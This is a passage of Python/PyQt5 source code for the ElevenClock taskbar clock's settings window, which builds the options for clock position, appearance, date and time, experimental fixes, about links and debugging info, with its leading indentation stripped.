self.enableLowCpuMode = QSettingsCheckBoxWithWarning(_("Enable low-cpu mode"), _("You might lose functionalities, like the notification counter or the dynamic background"))
self.enableLowCpuMode.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.enableLowCpuMode.setChecked(getSettings("EnableLowCpuMode"))
self.enableLowCpuMode.stateChanged.connect(lambda i: setSettings("EnableLowCpuMode", bool(i)))
self.disableNotificationBadge = QSettingsCheckBox(_("Disable the notification badge"))
self.disableNotificationBadge.setChecked(getSettings("DisableNotifications"))
self.disableNotificationBadge.stateChanged.connect(lambda i: setSettings("DisableNotifications", bool(i)))
self.clockSettingsTitle.addWidget(self.disableNotificationBadge)
self.clockSettingsTitle.addWidget(self.enableLowCpuMode)
self.clockPosTitle = QSettingsTitle(_("Clock position and size:"), getPath(f"size_{self.iconMode}.png"), _("Clock size preferences, position offset, clock at the left, etc."))
layout.addWidget(self.clockPosTitle)
self.clockPosTitle.addWidget(self.showDesktopButton)
self.clockAtLeft = QSettingsCheckBox(_("Show the clock at the left of the screen"))
self.clockAtLeft.setChecked(getSettings("ClockOnTheLeft"))
self.clockAtLeft.stateChanged.connect(lambda i: setSettings("ClockOnTheLeft", bool(i)))
self.clockPosTitle.addWidget(self.clockAtLeft)
self.clockAtBottom = QSettingsCheckBox(_("Force the clock to be at the bottom of the screen"))
self.clockAtBottom.setChecked(getSettings("ForceOnBottom"))
self.clockAtBottom.stateChanged.connect(lambda i: setSettings("ForceOnBottom", bool(i)))
self.clockPosTitle.addWidget(self.clockAtBottom)
self.clockAtTop = QSettingsCheckBox(_("Force the clock to be at the top of the screen"))
self.clockAtTop.setChecked(getSettings("ForceOnTop"))
self.clockAtTop.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.clockAtTop.stateChanged.connect(lambda i: setSettings("ForceOnTop", bool(i)))
self.clockPosTitle.addWidget(self.clockAtTop)
self.clockFixedHeight = QSettingsSliderWithCheckBox(_("Override clock default height"), self, 20, 105)
self.clockFixedHeight.setChecked(getSettings("ClockFixedHeight"))
if self.clockFixedHeight.isChecked():
try:
self.clockFixedHeight.slider.setValue(int(getSettingsValue("ClockFixedHeight")))
except ValueError:
print("🟠 Unable to parse int from ClockFixedHeight settings value")
self.clockFixedHeight.stateChanged.connect(lambda v: setSettings("ClockFixedHeight", bool(v)))
self.clockFixedHeight.valueChanged.connect(lambda v: setSettingsValue("ClockFixedHeight", str(v)))
self.clockPosTitle.addWidget(self.clockFixedHeight)
self.ClockFixedWidth = QSettingsSliderWithCheckBox(_("Specify a minimum width for the clock"), self, 30, 200)
self.ClockFixedWidth.setChecked(getSettings("ClockFixedWidth"))
if self.ClockFixedWidth.isChecked():
try:
self.ClockFixedWidth.slider.setValue(int(getSettingsValue("ClockFixedWidth")))
except ValueError:
print("🟠 Unable to parse int from ClockFixedWidth settings value")
self.ClockFixedWidth.stateChanged.connect(lambda v: setSettings("ClockFixedWidth", bool(v)))
self.ClockFixedWidth.valueChanged.connect(lambda v: setSettingsValue("ClockFixedWidth", str(v)))
self.clockPosTitle.addWidget(self.ClockFixedWidth)
self.clockXOffset = QSettingsSliderWithCheckBox(_("Adjust horizontal clock position"), self, -200, 200)
self.clockXOffset.setChecked(getSettings("ClockXOffset"))
if self.clockXOffset.isChecked():
try:
self.clockXOffset.slider.setValue(int(getSettingsValue("ClockXOffset")))
except ValueError:
print("🟠 Unable to parse int from ClockXOffset settings value")
self.clockXOffset.stateChanged.connect(lambda v: setSettings("ClockXOffset", bool(v)))
self.clockXOffset.valueChanged.connect(lambda v: setSettingsValue("ClockXOffset", str(v)))
self.clockPosTitle.addWidget(self.clockXOffset)
self.clockYOffset = QSettingsSliderWithCheckBox(_("Adjust vertical clock position"), self, -200, 200)
self.clockYOffset.setChecked(getSettings("ClockYOffset"))
if self.clockYOffset.isChecked():
try:
self.clockYOffset.slider.setValue(int(getSettingsValue("ClockYOffset")))
except ValueError:
print("🟠 Unable to parse int from clockYOffset settings value")
self.clockYOffset.stateChanged.connect(lambda v: setSettings("ClockYOffset", bool(v)))
self.clockYOffset.valueChanged.connect(lambda v: setSettingsValue("ClockYOffset", str(v)))
self.clockPosTitle.addWidget(self.clockYOffset)
def unblacklist():
global msg
setSettingsValue("BlacklistedMonitors", "")
globals.restartClocks()
msg = QFramelessDialog(parent=self, closeOnClick=True)
msg.setAutoFillBackground(True)
msg.setStyleSheet(globals.sw.styleSheet())
msg.setAttribute(Qt.WA_StyledBackground)
msg.setObjectName("QMessageBox")
msg.setTitle(_("Success"))
msg.setText(f"""{_("The monitors were unblacklisted successfully.")}<br>
{_("Now you should see the clock everywhere")}""")
msg.addButton(_("Ok"), QDialogButtonBox.ButtonRole.ApplyRole)
msg.setDefaultButtonRole(QDialogButtonBox.ButtonRole.ApplyRole, self.styleSheet())
msg.show()
self.unBlackListButton = QSettingsButton(_("Reset monitor blacklisting status"), _("Reset"))
self.unBlackListButton.clicked.connect(unblacklist)
self.clockPosTitle.addWidget(self.unBlackListButton)
self.clockAppearanceTitle = QSettingsTitle(_("Clock Appearance:"), getPath(f"appearance_{self.iconMode}.png"), _("Clock's font, font size, font color and background, text alignment"))
layout.addWidget(self.clockAppearanceTitle)
self.fontPrefs = QSettingsFontBoxComboBox(_("Use a custom font"))
self.fontPrefs.setChecked(getSettings("UseCustomFont"))
if self.fontPrefs.isChecked():
customFont = getSettingsValue("UseCustomFont")
if customFont:
self.fontPrefs.combobox.setCurrentText(customFont)
self.fontPrefs.combobox.lineEdit().setFont(QFont(customFont))
else:
if lang == lang_ko:
self.fontPrefs.combobox.setCurrentText("Malgun Gothic")
elif lang == lang_zh_TW:
self.fontPrefs.combobox.setCurrentText("Microsoft JhengHei UI")
elif lang == lang_zh_CN:
self.fontPrefs.combobox.setCurrentText("Microsoft YaHei UI")
else:
self.fontPrefs.combobox.setCurrentText("Segoe UI Variable Display")
self.fontPrefs.stateChanged.connect(lambda i: setSettings("UseCustomFont", bool(i)))
self.fontPrefs.valueChanged.connect(lambda v: setSettingsValue("UseCustomFont", v))
self.clockAppearanceTitle.addWidget(self.fontPrefs)
self.fontSize = QSettingsSizeBoxComboBox(_("Use a custom font size"))
self.fontSize.setChecked(getSettings("UseCustomFontSize"))
self.fontSize.loadItems()
if self.fontSize.isChecked():
customFontSize = getSettingsValue("UseCustomFontSize")
if customFontSize:
self.fontSize.combobox.setCurrentText(customFontSize)
else:
self.fontSize.combobox.setCurrentText("9")
self.fontSize.stateChanged.connect(lambda i: setSettings("UseCustomFontSize", bool(i)))
self.fontSize.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontSize", v))
self.clockAppearanceTitle.addWidget(self.fontSize)
self.fontColor = QSettingsSizeBoxColorDialog(_("Use a custom font color"))
self.fontColor.setChecked(getSettings("UseCustomFontColor"))
if self.fontColor.isChecked():
self.fontColor.button.setStyleSheet(f"color: rgb({getSettingsValue('UseCustomFontColor')})")
self.fontColor.stateChanged.connect(lambda i: setSettings("UseCustomFontColor", bool(i)))
self.fontColor.valueChanged.connect(lambda v: setSettingsValue("UseCustomFontColor", v))
self.clockAppearanceTitle.addWidget(self.fontColor)
self.disableSystemTrayColor = QSettingsCheckBox(_("Disable clock taskbar background color (make clock transparent)"))
self.disableSystemTrayColor.setChecked(getSettings("DisableTaskbarBackgroundColor"))
self.disableSystemTrayColor.stateChanged.connect(lambda i: setSettings("DisableTaskbarBackgroundColor", bool(i)))
self.clockAppearanceTitle.addWidget(self.disableSystemTrayColor)
self.backgroundcolor = QSettingsBgBoxColorDialog(_("Use a custom background color"))
self.backgroundcolor.setChecked(getSettings("UseCustomBgColor"))
self.backgroundcolor.colorDialog.setOption(QColorDialog.ShowAlphaChannel, True)
if self.backgroundcolor.isChecked():
self.backgroundcolor.button.setStyleSheet(f"background-color: rgba({getSettingsValue('UseCustomBgColor')})")
self.backgroundcolor.stateChanged.connect(lambda i: setSettings("UseCustomBgColor", bool(i)))
self.backgroundcolor.valueChanged.connect(lambda v: setSettingsValue("UseCustomBgColor", v))
self.clockAppearanceTitle.addWidget(self.backgroundcolor)
self.accentBgColor = QSettingsCheckBox(_("Use system accent color as background color"))
self.accentBgColor.setChecked(getSettings("AccentBackgroundcolor"))
self.accentBgColor.stateChanged.connect(lambda i: setSettings("AccentBackgroundcolor", bool(i)))
self.clockAppearanceTitle.addWidget(self.accentBgColor)
self.centerText = QSettingsCheckBox(_("Align the clock text to the center"))
self.centerText.setChecked(getSettings("CenterAlignment"))
self.centerText.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.centerText.stateChanged.connect(lambda i: setSettings("CenterAlignment", bool(i)))
self.clockAppearanceTitle.addWidget(self.centerText)
        self.dateTimeTitle = QSettingsTitle(_("Date & Time Settings:"), getPath(f"datetime_{self.iconMode}.png"), _("Date format, Time format, seconds, weekday, week number, regional settings"))
layout.addWidget(self.dateTimeTitle)
self.showTime = QSettingsCheckBox(_("Show time on the clock"))
self.showTime.setChecked(not getSettings("DisableTime"))
self.showTime.stateChanged.connect(lambda i: setSettings("DisableTime", not bool(i), r = False))
self.dateTimeTitle.addWidget(self.showTime)
self.showSeconds = QSettingsCheckBox(_("Show seconds on the clock"))
self.showSeconds.setChecked(getSettings("EnableSeconds"))
self.showSeconds.stateChanged.connect(lambda i: setSettings("EnableSeconds", bool(i), r = False))
self.dateTimeTitle.addWidget(self.showSeconds)
self.showDate = QSettingsCheckBox(_("Show date on the clock"))
self.showDate.setChecked(not getSettings("DisableDate"))
self.showDate.stateChanged.connect(lambda i: setSettings("DisableDate", not bool(i), r = False))
self.dateTimeTitle.addWidget(self.showDate)
self.showWeekCount = QSettingsCheckBox(_("Show week number on the clock"))
self.showWeekCount.setChecked(getSettings("EnableWeekNumber"))
self.showWeekCount.stateChanged.connect(lambda i: setSettings("EnableWeekNumber", bool(i), r = False))
self.dateTimeTitle.addWidget(self.showWeekCount)
self.showWeekday = QSettingsCheckBox(_("Show weekday on the clock"))
self.showWeekday.setChecked(getSettings("EnableWeekDay"))
self.showWeekday.stateChanged.connect(lambda i: setSettings("EnableWeekDay", bool(i)))
self.dateTimeTitle.addWidget(self.showWeekday)
self.RegionButton = QSettingsButton(_("Change date and time format (Regional settings)"), _("Regional settings"))
self.RegionButton.clicked.connect(lambda: os.startfile("intl.cpl"))
self.dateTimeTitle.addWidget(self.RegionButton)
self.experimentalTitle = QSettingsTitle(_("Fixes and other experimental features: (Use ONLY if something is not working)"), getPath(f"experiment_{self.iconMode}.png"), _("Testing features and error-fixing tools"))
layout.addWidget(self.experimentalTitle)
self.wizardButton = QSettingsButton(_("Open the welcome wizard")+_(" (ALPHA STAGE, MAY NOT WORK)"), _("Open"))
def ww():
global welcomewindow
welcomewindow = welcome.WelcomeWindow()
self.wizardButton.clicked.connect(ww)
self.wizardButton.button.setObjectName("AccentButton")
self.wizardButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.experimentalTitle.addWidget(self.wizardButton)
self.fixDash = QSettingsCheckBox(_("Fix the hyphen/dash showing over the month"))
self.fixDash.setChecked(getSettings("EnableHyphenFix"))
self.fixDash.stateChanged.connect(lambda i: setSettings("EnableHyphenFix", bool(i)))
self.experimentalTitle.addWidget(self.fixDash)
self.fixSSL = QSettingsCheckBox(_("Alternative non-SSL update server (This might help with SSL errors)"))
self.fixSSL.setChecked(getSettings("AlternativeUpdateServerProvider"))
self.fixSSL.stateChanged.connect(lambda i: setSettings("AlternativeUpdateServerProvider", bool(i)))
self.experimentalTitle.addWidget(self.fixSSL)
self.win32alignment = QSettingsCheckBox(_("Alternative clock alignment (may not work)"))
self.win32alignment.setChecked(getSettings("EnableWin32API"))
self.win32alignment.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: {self.getPx(1)}px;}}")
self.win32alignment.stateChanged.connect(lambda i: setSettings("EnableWin32API", bool(i)))
self.experimentalTitle.addWidget(self.win32alignment)
        self.legacyRDPHide = QSettingsCheckBox((_("Hide the clock when RDP Client or Citrix Workspace are running")+" (Old method)").replace("RDP", "RDP, VMWare Horizon"))
self.legacyRDPHide.setChecked(getSettings("EnableHideOnRDP"))
self.legacyRDPHide.stateChanged.connect(lambda i: setSettings("EnableHideOnRDP", bool(i)))
self.experimentalTitle.addWidget(self.legacyRDPHide)
self.legacyFullScreenHide = QSettingsCheckBox(_("Check only the focused window on the fullscreen check"))
self.legacyFullScreenHide.setChecked(getSettings("legacyFullScreenMethod"))
self.legacyFullScreenHide.stateChanged.connect(lambda i: setSettings("legacyFullScreenMethod", bool(i)))
self.experimentalTitle.addWidget(self.legacyFullScreenHide)
self.languageSettingsTitle = QSettingsTitle(_("About the language pack:"), getPath(f"lang_{self.iconMode}.png"), _("Language pack author(s), help translating ElevenClock"))
layout.addWidget(self.languageSettingsTitle)
self.PackInfoButton = QSettingsButton(_("Translated to English by martinet101"), "")
self.PackInfoButton.button.hide()
self.PackInfoButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.languageSettingsTitle.addWidget(self.PackInfoButton)
self.openTranslateButton = QSettingsButton(_("Translate ElevenClock to your language"), _("Get started"))
self.openTranslateButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/wiki/Translating-ElevenClock#translating-elevenclock"))
self.languageSettingsTitle.addWidget(self.openTranslateButton)
def thirdPartyLicenses():
msg = QFramelessDialog(parent=self, closeOnClick=False)
msg.setAutoFillBackground(True)
msg.setStyleSheet(self.styleSheet())
msg.setAttribute(Qt.WA_StyledBackground)
msg.setWindowFlag(Qt.WindowStaysOnTopHint)
msg.setObjectName("QMessageBox")
msg.setTitle(_("Third Party Open-Source Software in Elevenclock {0} (And their licenses)").format(versionName))
colors = getColors()
msg.setText(f"""
<p>{_("ElevenClock is an Open-Source application made with the help of other libraries made by the community:")}</p><br>
<style> a {{color: rgb({colors[2 if isWindowDark() else 4]})}}</style>
<ul>
<li> <b>Python 3.9</b>: <a href="https://docs.python.org/3/license.html">PSF License Agreement</a></li>
<li> <b>Win32mica</b> (Also made by me): <a href="https://github.com/martinet101/pymica/blob/master/LICENSE">MIT License</a></li>
<li> <b>PyWin32</b>: <a href="https://pypi.org/project/pynput/">LGPL-v3</a></li>
<li> <b>PyQt5 (Qt5)</b>: <a href="https://www.riverbankcomputing.com/commercial/license-faq">LGPL-v3</a></li>
<li> <b>Psutil</b>: <a href="https://github.com/giampaolo/psutil/blob/master/LICENSE">BSD 3-Clause</a></li>
<li> <b>PyInstaller</b>: <a href="https://www.pyinstaller.org/license.html">Custom GPL</a></li>
<li> <b>Frameless Window</b>: <a href="https://github.com/mustafaahci/FramelessWindow/blob/master/LICENSE">The Unlicense</a></li>
<li> <b>WNFUN</b>: <a href="https://github.com/ionescu007/wnfun/blob/master/LICENSE">BSD 2-Clause</a></li>
</ul> """)
msg.addButton(_("Ok"), QDialogButtonBox.ButtonRole.ApplyRole, lambda: msg.close())
msg.addButton(_("More Info"), QDialogButtonBox.ButtonRole.ResetRole, lambda: os.startfile("https://github.com/martinet101/ElevenClock/wiki#third-party-libraries"))
def closeAndQt():
msg.close()
QMessageBox.aboutQt(self, "ElevenClock - "+_("About Qt"))
msg.addButton(_("About Qt"), QDialogButtonBox.ButtonRole.ResetRole, lambda: closeAndQt())
msg.setDefaultButtonRole(QDialogButtonBox.ButtonRole.ApplyRole, self.styleSheet())
msg.show()
self.aboutTitle = QSettingsTitle(_("About ElevenClock version {0}:").format(versionName), getPath(f"about_{self.iconMode}.png"), _("Info, report a bug, submit a feature request, donate, about"))
layout.addWidget(self.aboutTitle)
self.WebPageButton = QSettingsButton(_("View ElevenClock's homepage"), _("Open"))
self.WebPageButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/"))
self.WebPageButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.WebPageButton)
self.ThirdParty = QSettingsButton(_("Third party licenses"), _("View"))
self.ThirdParty.clicked.connect(lambda: thirdPartyLicenses())
self.ThirdParty.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.ThirdParty)
self.IssueButton = QSettingsButton(_("Report an issue/request a feature"), _("Report"))
self.IssueButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/issues/new/choose"))
self.IssueButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.IssueButton)
self.CofeeButton = QSettingsButton(_("Support the dev: Give me a coffee☕"), _("Open page"))
self.CofeeButton.clicked.connect(lambda: os.startfile("https://ko-fi.com/martinet101"))
self.CofeeButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.aboutTitle.addWidget(self.CofeeButton)
self.closeButton = QSettingsButton(_("Close settings"), _("Close"))
self.closeButton.clicked.connect(lambda: self.hide())
self.aboutTitle.addWidget(self.closeButton)
        self.debbuggingTitle = QSettingsTitle(_("Debugging information:"), getPath(f"bug_{self.iconMode}.png"), _("Log, debugging information"))
layout.addWidget(self.debbuggingTitle)
self.helpButton = QSettingsButton(_("Open online help to troubleshoot problems"), _("Open"))
self.helpButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.helpButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/wiki/Troubleshooting"))
self.debbuggingTitle.addWidget(self.helpButton)
self.resetButton = QSettingsButton(_("Reset ElevenClock preferences to defaults"), _("Reset"))
self.resetButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
def resetSettings():
for file in glob.glob(os.path.join(os.path.expanduser("~"), ".elevenclock/*")):
if not "Running" in file:
try:
os.remove(file)
except:
pass
self.resetButton.clicked.connect(lambda: (resetSettings(), os.startfile(sys.executable)))
self.debbuggingTitle.addWidget(self.resetButton)
self.logButton = QSettingsButton(_("Open ElevenClock's log"), _("Open"))
self.logButton.clicked.connect(lambda: self.openLogWindow())
self.logButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
self.debbuggingTitle.addWidget(self.logButton)
try:
if importedPsutil:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {str(int(platform.release())+1) if int(platform.version().split('.')[-1])>=22000 else platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
else:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {str(int(platform.release())+1) if int(platform.version().split('.')[-1])>=22000 else platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: Unknown\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
except Exception as e:
report(e)
if importedPsutil:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
else:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: Unknown\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
self.hiddenButton.button.setVisible(False)
self.debbuggingTitle.addWidget(self.hiddenButton)
self.notFoundLabel = QLabel(_("No results were found"))
if isWindowDark():
self.notFoundLabel.setStyleSheet(f"padding-top: {self.getPx(30)}px;font-size: 16pt; font-weight: bold; color: rgba(255, 255, 255, 50%)")
else:
self.notFoundLabel.setStyleSheet(f"padding-top: {self.getPx(30)}px;font-size: 16pt; font-weight: bold; color: rgba(0, 0, 0, 50%)")
self.notFoundLabel.setAlignment(Qt.AlignCenter)
layout.addWidget(self.notFoundLabel)
self.notFoundLabel.hide()
layout.addSpacing(15)
layout.addStretch()
class QStaticWidget(QWidget):
def __init__(self) -> None:
super().__init__()
self.setFixedHeight(1)
self.settingsWidget.setLayout(layout)
self.scrollArea.setWidget(self.settingsWidget)
self.scrollArea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.searchBox = QLineEdit()
self.searchBox.setClearButtonEnabled(True)
self.searchBox.setPlaceholderText(_("Search on the settings"))
self.searchBox.setContentsMargins(0, 0, 25, 0)
self.searchBox.textChanged.connect(self.filter)
titleLayout = QHBoxLayout()
titleLayout.setContentsMargins(0, 0, 0, 0)
titleLayout.setSpacing(0)
titleLayout.addWidget(title, stretch=1)
titleLayout.addWidget(self.searchBox)
svl = QVBoxLayout()
svl.setSpacing(0)
svl.setContentsMargins(0, 0, 0, 0)
svl.addLayout(titleLayout, stretch=0)
svl.addWidget(self.scrollArea, stretch=1)
self.staticVerticalWidget = QWidget()
self.staticVerticalWidget.setMaximumWidth(self.getPx(1000))
self.staticVerticalWidget.setLayout(svl)
self.scrollbar = QScrollBar()
self.scrollArea.setVerticalScrollBar(self.scrollbar)
shl = QHBoxLayout()
shl.setSpacing(0)
shl.setContentsMargins(0, 0, 0, 0)
shl.addSpacing(16)
shl.addWidget(QStaticWidget(), stretch=0)
shl.addWidget(self.staticVerticalWidget, stretch=1)
shl.addWidget(QStaticWidget(), stretch=0)
shl.addWidget(self.scrollbar, stretch=0)
self.vlayout.addLayout(shl)
self.setWindowTitle(_("ElevenClock Settings"))
self.applyStyleSheet()
self.updateCheckBoxesStatus()
w = QWidget()
w.setObjectName("borderBackground")
w.setLayout(self.vlayout)
self.setCentralWidget(w)
self.setMouseTracking(True)
self.resize(self.getPx(1100), self.getPx(700))
self.hwnd = self.winId().__int__()
self.setAttribute(Qt.WA_TranslucentBackground)
if QtWin.isCompositionEnabled():
QtWin.extendFrameIntoClientArea(self, -1, -1, -1, -1)
else:
QtWin.resetExtendedFrame(self)
self.installEventFilter(self)
self.setWindowTitle("")
pixmap = QPixmap(32, 32)
pixmap.fill(Qt.transparent)
self.setWindowIcon(QIcon(pixmap))
def filter(self, query: str):
widgets: list[QSettingsTitle] = (
self.generalSettingsTitle,
self.clockSettingsTitle,
self.clockPosTitle,
self.clockAppearanceTitle,
self.dateTimeTitle,
self.experimentalTitle,
self.languageSettingsTitle,
self.aboutTitle,
self.debbuggingTitle
)
if query != "":
self.announcements.hide()
found = False
for w in widgets:
for item in w.getChildren():
if query.lower() in item.text().lower():
item.show()
found = True
else:
item.hide()
w.searchMode = True
w.resizeEvent(QResizeEvent(w.size(), w.size()))
if not found:
self.notFoundLabel.show()
else:
self.notFoundLabel.hide()
else:
self.announcements.show()
for w in widgets:
for item in w.getChildren():
item.show()
w.searchMode = False
self.notFoundLabel.hide()
w.resizeEvent(QResizeEvent(w.size(), w.size()))
def showEvent(self, event: QShowEvent) -> None:
threading.Thread(target=self.announcements.loadAnnouncements, daemon=True, name="Settings: Announce loader").start()
return super().showEvent(event)
def updateCheckBoxesStatus(self):
# General settings section
if not self.enableUpdates.isChecked(): # Check if check for updates enabled
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically check for updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
if not self.installUpdates.isChecked(): # Check if install updates enabled
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically install available updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
# Date & time settings
if not self.showTime.isChecked(): # Check if time is shown
self.showSeconds.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show time on the clock")))
self.showSeconds.setEnabled(False)
else:
self.showSeconds.setToolTip("")
self.showSeconds.setEnabled(True)
if not self.showDate.isChecked(): # Check if date is shown
self.showWeekCount.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show date on the clock")))
self.showWeekCount.setEnabled(False)
else:
self.showWeekCount.setToolTip("")
self.showWeekCount.setEnabled(True)
if not self.primaryScreen.isChecked(): # Clock is set to be in primary monitor
self.onlyPrimaryScreen.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show the clock on the primary screen")))
self.onlyPrimaryScreen.setEnabled(False)
self.onlyPrimaryScreen.setChecked(False)
else:
self.onlyPrimaryScreen.setToolTip("")
self.onlyPrimaryScreen.setEnabled(True)
if self.enableLowCpuMode.isChecked():
self.disableSystemTrayColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Enable low-cpu mode")))
self.disableSystemTrayColor.setEnabled(False)
self.disableNotificationBadge.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Enable low-cpu mode")))
self.disableNotificationBadge.setEnabled(False)
self.legacyRDPHide.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Enable low-cpu mode")))
self.legacyRDPHide.setEnabled(False)
else:
self.disableSystemTrayColor.setToolTip("")
self.disableSystemTrayColor.setEnabled(True)
self.disableNotificationBadge.setToolTip("")
self.disableNotificationBadge.setEnabled(True)
self.legacyRDPHide.setToolTip("")
self.legacyRDPHide.setEnabled(True)
if self.backgroundcolor.isChecked():
self.disableSystemTrayColor.setEnabled(False)
self.disableSystemTrayColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use a custom background color")))
self.accentBgColor.setEnabled(False)
self.accentBgColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use a custom background color")))
else:
self.disableSystemTrayColor.setEnabled(True)
self.disableSystemTrayColor.setToolTip("")
self.accentBgColor.setEnabled(True)
self.accentBgColor.setToolTip("")
if self.accentBgColor.isChecked():
self.disableSystemTrayColor.setEnabled(False)
self.disableSystemTrayColor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use system accent color as background color")))
self.backgroundcolor.setEnabled(False)
self.backgroundcolor.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Use system accent color as background color")))
else:
self.disableSystemTrayColor.setEnabled(True)
self.disableSystemTrayColor.setToolTip("")
self.backgroundcolor.setEnabled(True)
self.backgroundcolor.setToolTip("")
def applyStyleSheet(self):
self.staticVerticalWidget.setMaximumWidth(self.getPx(1000))
colors = getColors()
if isWindowDark():
if ApplyMica(self.winId().__int__(), MICAMODE.DARK) != 0x0:
GlobalBlur(self.winId(), Dark=True, Acrylic=True, hexColor="#333333ff")
self.iconMode = "white"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.clockPosTitle.setIcon(getPath(f"size_{self.iconMode}.png"))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.setStyleSheet(f"""
#backgroundWindow {{
/*background-color: rgba({colors[3]}, 1);*/
background: transparent;
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba(80, 80, 80, 25%);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 25%);
}}
QSlider {{
background: transparent;
height: {self.getPx(20)}px;
margin-left: {self.getPx(10)}px;
margin-right: {self.getPx(10)}px;
border-radius: {self.getPx(2)}px;
}}
QSlider::groove {{
height: {self.getPx(4)}px;
border: {self.getPx(1)}px solid #212121;
background: #212121;
